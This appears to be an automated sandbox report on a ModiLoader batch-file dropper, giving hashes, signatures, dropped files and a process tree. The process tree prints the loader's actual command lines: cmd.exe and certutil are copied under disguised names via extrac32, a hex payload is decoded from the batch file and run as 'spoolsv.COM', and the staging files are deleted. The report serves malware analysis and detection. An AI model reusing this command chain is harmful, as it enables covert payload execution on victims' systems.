modiloader | 39c526c0e514a316dd3543eec30e7e8a92b1aef715897e7fe3833902a7cf3bc3

Analysis

max time kernel
141s
max time network
145s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18-09-2024 01:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

39c526c0e514a316dd3543eec30e7e8a92b1aef715897e7fe3833902a7cf3bc3.bat
Size

6.3MB
MD5

ff9b413f71937d07ec92a927d0b40b72
SHA1

9ba71de70f0b559b3f44c13612b928c9e5399418
SHA256

39c526c0e514a316dd3543eec30e7e8a92b1aef715897e7fe3833902a7cf3bc3
SHA512

d5373457e226a6e5ff4d01f1b0729a0153310960b6b25f5f28c2e1554bb89ffa0c5d6bdd18a39a278f61a32f8c11152ae784f37e1dd082838afd46c1fac8a06e
SSDEEP

49152:rwwXxjCN45WUd/Apb9rX9tNVWOf0aRzePuQvZfnSWTKMqIl5ec2HKhv3AVkoeXrP:B

Score

10^/10

modiloader discovery trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

resource	yara_rule
behavioral1/memory/1644-35-0x0000000002BA0000-0x0000000003BA0000-memory.dmp	modiloader_stage2

Executes dropped EXE 8 IoCs

pid	Process
1932	alpha.exe
1812	alpha.exe
3064	kn.exe
2260	alpha.exe
2136	kn.exe
1644	spoolsv.COM
2224	alpha.exe
2728	alpha.exe

Loads dropped DLL 7 IoCs

pid	Process
2668	cmd.exe
2668	cmd.exe
1812	alpha.exe
2668	cmd.exe
2260	alpha.exe
2668	cmd.exe
2668	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.COM

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1644	spoolsv.COM

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2668 wrote to memory of 1444	2668	cmd.exe	31
PID 2668 wrote to memory of 1444	2668	cmd.exe	31
PID 2668 wrote to memory of 1444	2668	cmd.exe	31
PID 2668 wrote to memory of 1932	2668	cmd.exe	32
PID 2668 wrote to memory of 1932	2668	cmd.exe	32
PID 2668 wrote to memory of 1932	2668	cmd.exe	32
PID 1932 wrote to memory of 1740	1932	alpha.exe	33
PID 1932 wrote to memory of 1740	1932	alpha.exe	33
PID 1932 wrote to memory of 1740	1932	alpha.exe	33
PID 2668 wrote to memory of 1812	2668	cmd.exe	34
PID 2668 wrote to memory of 1812	2668	cmd.exe	34
PID 2668 wrote to memory of 1812	2668	cmd.exe	34
PID 1812 wrote to memory of 3064	1812	alpha.exe	35
PID 1812 wrote to memory of 3064	1812	alpha.exe	35
PID 1812 wrote to memory of 3064	1812	alpha.exe	35
PID 2668 wrote to memory of 2260	2668	cmd.exe	36
PID 2668 wrote to memory of 2260	2668	cmd.exe	36
PID 2668 wrote to memory of 2260	2668	cmd.exe	36
PID 2260 wrote to memory of 2136	2260	alpha.exe	37
PID 2260 wrote to memory of 2136	2260	alpha.exe	37
PID 2260 wrote to memory of 2136	2260	alpha.exe	37
PID 2668 wrote to memory of 1644	2668	cmd.exe	38
PID 2668 wrote to memory of 1644	2668	cmd.exe	38
PID 2668 wrote to memory of 1644	2668	cmd.exe	38
PID 2668 wrote to memory of 1644	2668	cmd.exe	38
PID 2668 wrote to memory of 2224	2668	cmd.exe	39
PID 2668 wrote to memory of 2224	2668	cmd.exe	39
PID 2668 wrote to memory of 2224	2668	cmd.exe	39
PID 2668 wrote to memory of 2728	2668	cmd.exe	40
PID 2668 wrote to memory of 2728	2668	cmd.exe	40
PID 2668 wrote to memory of 2728	2668	cmd.exe	40
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM
PID 1644 wrote to memory of 0	1644	spoolsv.COM

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\39c526c0e514a316dd3543eec30e7e8a92b1aef715897e7fe3833902a7cf3bc3.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:1444
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:1740
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\39c526c0e514a316dd3543eec30e7e8a92b1aef715897e7fe3833902a7cf3bc3.bat" "C:\\Users\\Public\\spoolsv.MPEG" 3
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\39c526c0e514a316dd3543eec30e7e8a92b1aef715897e7fe3833902a7cf3bc3.bat" "C:\\Users\\Public\\spoolsv.MPEG" 3
    3⤵
    - Executes dropped EXE
    PID:3064
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 10
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2260
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 10
    3⤵
    - Executes dropped EXE
    PID:2136
- C:\Users\Public\Libraries\spoolsv.COM
  C:\Users\Public\Libraries\spoolsv.COM
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:1644
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2224
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Libraries\spoolsv.COM

Filesize
1.3MB

MD5
93f9544a57c66db2a89f711bc87b2bcf

SHA1
7b55183c9a0c38bcb778deff3f0534690edba1a1

SHA256
6a521f811e449a60a689fbd30ed47be775bdc73cba6c9a99dc927f7bf720a11a

SHA512
df9ea524733645b1f179cb1b4d1e1f040a66ac2c774ef9f2afb04504ffe4d5d316e524eb663e0a9b1502f8f3fb3cda5c46f1096a5c3278e948b834f168007a0d

Download Submit
C:\Users\Public\spoolsv.MPEG

Filesize
4.4MB

MD5
fb784626da657f1cc38fe53ded33b522

SHA1
0dbccd37f47d25d97fd60124ef1c7e4ab210751c

SHA256
57a7606bd8add2ea12f253b5bb0be48f4dda53490e036498d97083383db4b595

SHA512
2b788dd61ec3a1b72746015d88038465c6ca9646199a3e1cc25f48e947a42dc4944580c60550290aa80532731945baa58ba18df5b1d862922123ad1df98f0fe4

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
memory/1644-34-0x0000000002BA0000-0x0000000003BA0000-memory.dmp

Filesize
16.0MB

Download
memory/1644-35-0x0000000002BA0000-0x0000000003BA0000-memory.dmp

Filesize
16.0MB

Download
memory/1644-37-0x0000000000400000-0x000000000054B000-memory.dmp

Filesize
1.3MB

Download